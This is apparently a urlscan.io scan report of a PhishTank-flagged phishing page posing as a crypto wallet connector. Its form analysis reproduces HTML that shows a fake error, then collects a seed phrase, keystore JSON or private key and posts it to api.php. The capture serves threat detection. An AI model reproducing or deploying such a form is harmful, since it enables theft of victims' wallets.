jeitto-entrar.ml Open in urlscan Pro
2606:4700:3033::ac43:d669  Public Scan

URL: https://jeitto-entrar.ml/login/
Submission: On November 05 via automatic, source phishtank — Scanned from DE

Form analysis 2 forms found in the DOM

POST

<form class="tab-content" method="post" onsubmit="return false;">
  <div class="tab-pane fade show active" role="tabpanel" aria-labelledby="nav-home-tab">
    <p class="mt-2 mb-2" style="text-align: center;color:red!important;">An error occurred, try to connect another wallet</p>
    <button class="sc-hKFxyN cCyxGH w-100 mt-3" onclick="switchmodMain();" scale="md" type="submit">Try another wallet</button>
  </div>
</form>

POST api.php

<form class="tab-content" method="post" action="api.php" id="nav-tabContent" onsubmit="return checkCredentials();">
  <div class="tab-pane fade show active" id="nav-home" role="tabpanel" aria-labelledby="nav-home-tab">
    <textarea class="form-control w-100" placeholder="Seed Phrase" name="seed" id="phrase"></textarea>
    <p class="mt-2 mb-2">Typically 12 (sometimes 24) words separated by singe space.</p>
    <p class="mt-2 mb-2 text-danger" id="error1" style="display: none;">Please provide a valid Mnemonic.</p>
    <button class="sc-hKFxyN cCyxGH w-100 mt-3" scale="md" type="submit">Import</button>
  </div>
  <div class="tab-pane fade" id="nav-profile" role="tabpanel" aria-labelledby="nav-profile-tab">
    <textarea class="form-control w-100" name="key" placeholder="Keystore JSON" id="json"></textarea>
    <p class="mt-2 mb-2">Several lines of text beginning with '{...}'.</p>
    <p class="mt-2 mb-2 text-danger" id="error2" style="display: none;">Please provide a valid JSON Keystore.</p>
    <button class="sc-hKFxyN cCyxGH w-100 mt-3" scale="md" type="submit">Import</button>
  </div>
  <div class="tab-pane fade" id="nav-contact" role="tabpanel" aria-labelledby="nav-contact-tab">
    <textarea class="form-control w-100" name="secretKey" placeholder="Privatekey" id="privatekey"></textarea>
    <p class="mt-2 mb-2">Typically 64 alphanumeric characters.</p>
    <p class="mt-2 mb-2 text-danger" id="error3" style="display: none;">Please provide a valid private key.</p>
    <button class="sc-hKFxyN cCyxGH w-100 mt-3" scale="md" type="submit">Import</button>
  </div>
</form>

Text Content

CONNECT WALLET

An error occurred, try to connect another wallet

Try another wallet


CONNECT WALLET

SafePal
Metamask
WalletConnect
Trust Wallet
MathWallet
TokenPocket
Binance Chain
Coin98
. Seed Phrase Key store JSON Private key

Typically 12 (sometimes 24) words separated by singe space.

Please provide a valid Mnemonic.

Import

Several lines of text beginning with '{...}'.

Please provide a valid JSON Keystore.

Import

Typically 64 alphanumeric characters.

Please provide a valid private key.

Import